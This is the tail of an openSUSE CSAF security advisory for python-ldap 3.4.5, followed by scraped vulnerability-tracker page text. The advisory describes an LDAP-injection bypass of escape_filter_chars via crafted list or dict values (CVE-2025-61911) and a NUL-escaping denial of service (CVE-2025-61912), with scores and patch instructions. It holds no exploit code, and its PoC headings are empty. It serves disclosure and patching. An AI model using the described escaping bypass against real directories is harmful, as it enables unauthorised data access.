                "category": "product_version",
                "name": "python313-ldap-3.4.5-1.1.ppc64le",
                "product": {
                  "name": "python313-ldap-3.4.5-1.1.ppc64le",
                  "product_id": "python313-ldap-3.4.5-1.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-ldap-3.4.5-1.1.s390x",
                "product": {
                  "name": "python311-ldap-3.4.5-1.1.s390x",
                  "product_id": "python311-ldap-3.4.5-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python312-ldap-3.4.5-1.1.s390x",
                "product": {
                  "name": "python312-ldap-3.4.5-1.1.s390x",
                  "product_id": "python312-ldap-3.4.5-1.1.s390x"
                }
              },
              {
                "category": "product_version",
                "name": "python313-ldap-3.4.5-1.1.s390x",
                "product": {
                  "name": "python313-ldap-3.4.5-1.1.s390x",
                  "product_id": "python313-ldap-3.4.5-1.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "python311-ldap-3.4.5-1.1.x86_64",
                "product": {
                  "name": "python311-ldap-3.4.5-1.1.x86_64",
                  "product_id": "python311-ldap-3.4.5-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python312-ldap-3.4.5-1.1.x86_64",
                "product": {
                  "name": "python312-ldap-3.4.5-1.1.x86_64",
                  "product_id": "python312-ldap-3.4.5-1.1.x86_64"
                }
              },
              {
                "category": "product_version",
                "name": "python313-ldap-3.4.5-1.1.x86_64",
                "product": {
                  "name": "python313-ldap-3.4.5-1.1.x86_64",
                  "product_id": "python313-ldap-3.4.5-1.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-ldap-3.4.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64"
        },
        "product_reference": "python311-ldap-3.4.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-ldap-3.4.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le"
        },
        "product_reference": "python311-ldap-3.4.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-ldap-3.4.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x"
        },
        "product_reference": "python311-ldap-3.4.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python311-ldap-3.4.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64"
        },
        "product_reference": "python311-ldap-3.4.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-ldap-3.4.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64"
        },
        "product_reference": "python312-ldap-3.4.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-ldap-3.4.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le"
        },
        "product_reference": "python312-ldap-3.4.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-ldap-3.4.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x"
        },
        "product_reference": "python312-ldap-3.4.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python312-ldap-3.4.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64"
        },
        "product_reference": "python312-ldap-3.4.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-ldap-3.4.5-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64"
        },
        "product_reference": "python313-ldap-3.4.5-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-ldap-3.4.5-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le"
        },
        "product_reference": "python313-ldap-3.4.5-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-ldap-3.4.5-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x"
        },
        "product_reference": "python313-ldap-3.4.5-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "python313-ldap-3.4.5-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
        },
        "product_reference": "python313-ldap-3.4.5-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-61911",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-61911"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, the sanitization method `ldap.filter.escape_filter_chars` can be tricked to skip escaping of special characters when a crafted `list` or `dict` is supplied as the `assertion_value` parameter, and the non-default `escape_mode=1` is configured. The method `ldap.filter.escape_filter_chars` supports 3 different escaping modes. `escape_mode=0` (default) and `escape_mode=2` happen to raise exceptions when a `list` or `dict` object is supplied as the `assertion_value` parameter. However, `escape_mode=1` computes without performing adequate logic to ensure a fully escaped return value. If an application relies on the vulnerable method in the `python-ldap` library to escape untrusted user input, an attacker might be able to abuse the vulnerability to launch ldap injection attacks which could potentially disclose or manipulate ldap data meant to be inaccessible to them. Version 3.4.5 fixes the issue by adding a type check at the start of the `ldap.filter.escape_filter_chars` method to raise an exception when the supplied `assertion_value` parameter is not of type `str`.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-61911",
          "url": "https://www.suse.com/security/cve/CVE-2025-61911"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1251912 for CVE-2025-61911",
          "url": "https://bugzilla.suse.com/1251912"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-10-15T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-61911"
    },
    {
      "cve": "CVE-2025-61912",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-61912"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "python-ldap is a lightweight directory access protocol (LDAP) client API for Python. In versions prior to 3.4.5, ldap.dn.escape_dn_chars() escapes \\x00 incorrectly by emitting a backslash followed by a literal NUL byte instead of the RFC-4514 hex form \\00. Any application that uses this helper to construct DNs from untrusted input can be made to consistently fail before a request is sent to the LDAP server (e.g., AD), resulting in a client-side denial of service. Version 3.4.5 contains a patch for the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
          "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-61912",
          "url": "https://www.suse.com/security/cve/CVE-2025-61912"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1251913 for CVE-2025-61912",
          "url": "https://bugzilla.suse.com/1251913"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          },
          "products": [
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python311-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python312-ldap-3.4.5-1.1.x86_64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.aarch64",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.s390x",
            "openSUSE Tumbleweed:python313-ldap-3.4.5-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-10-15T00:00:00Z",
          "details": "moderate"
        }
      ],
      "title": "CVE-2025-61912"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-61912 (GCVE-0-2025-61912)

Vulnerability from cvelistv5

fkie_cve-2025-61912

Vulnerability from fkie_nvd

ghsa-p34h-wq7j-h5v6

Vulnerability from github

Summary

Details

PoC

--- Attacker-controlled value contains NUL ---

--- Correct hex escape demonstrates the client proceeds to the server ---

Impact

opensuse-su-2025:15637-1

Vulnerability from csaf_opensuse

Tags

Sightings

Nomenclature